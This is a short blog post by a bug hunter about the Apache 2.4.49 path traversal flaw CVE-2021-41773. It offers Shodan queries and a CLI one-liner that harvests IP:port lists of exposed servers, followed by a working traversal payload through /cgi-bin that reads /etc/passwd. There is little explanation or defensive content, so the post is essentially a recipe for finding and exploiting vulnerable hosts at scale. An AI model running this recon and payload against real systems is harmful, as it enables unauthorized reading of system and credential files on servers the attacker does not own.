Apache 0 Day !!

Hello Hunters! Today’s topic is about CVE 2021–41773. Without further delay let’s get start.

Description:

A vulnerability has been found in Apache HTTP Server 2.4.49 and classified as critical. This vulnerability affects an unknown code of the component Path Normalization. The manipulation with an unknown input lead to a Local File Inclusion. The CWE definition for the vulnerability is CWE-22. As an impact it is known to affect confidentiality, CVE-2021–41773 has been exploited in the wild as a zero-day.

Recon:

Shodan:

  • Search Query 1: Apache 2.4.49
  • Search Query 2: Server: Apache/2.4.49

Shodan CLI:

shodan search “Apache 2.4.49” --fields ip_str,port --separator “ “ | awk ‘{print $1”:”$2}’ | tee -a apache0day.txt

Exploitation:

target.com/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd

Template: Link

Instagram: th3.d1p4k

Twitter: Dipak Panchal

--

--

--

Bug hunter | CCSE

Love podcasts or audiobooks? Learn on the go with our new app.

Recommended from Medium

Remote Working: Are You Secure?

Are you sure that you really deleted your files?

Digital identity as a 3 week miracle

{UPDATE} Pixel Monster GO Hack Free Resources Generator

Privacy-as-Code: Preventing Facebook’s $5B violation using Fides Open-Source

Gaining Ground

The Benefits and Drawbacks of Web 2 (Part 2 of 7)

{UPDATE} Fit the Fat 3 Hack Free Resources Generator

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store
th3.d1p4k

th3.d1p4k

Bug hunter | CCSE

More from Medium

Testing Cloud (AWS & Azure) WAF Capabilities Against log4shell(CVE-2021–44228)

How to Make the Most of Your Pentest: Setting Pentest Stakeholders — Cyver

Utilization of OWASP Tools to protect against XSS vulnerabilities

How to use in-built docker tools for reconnaissance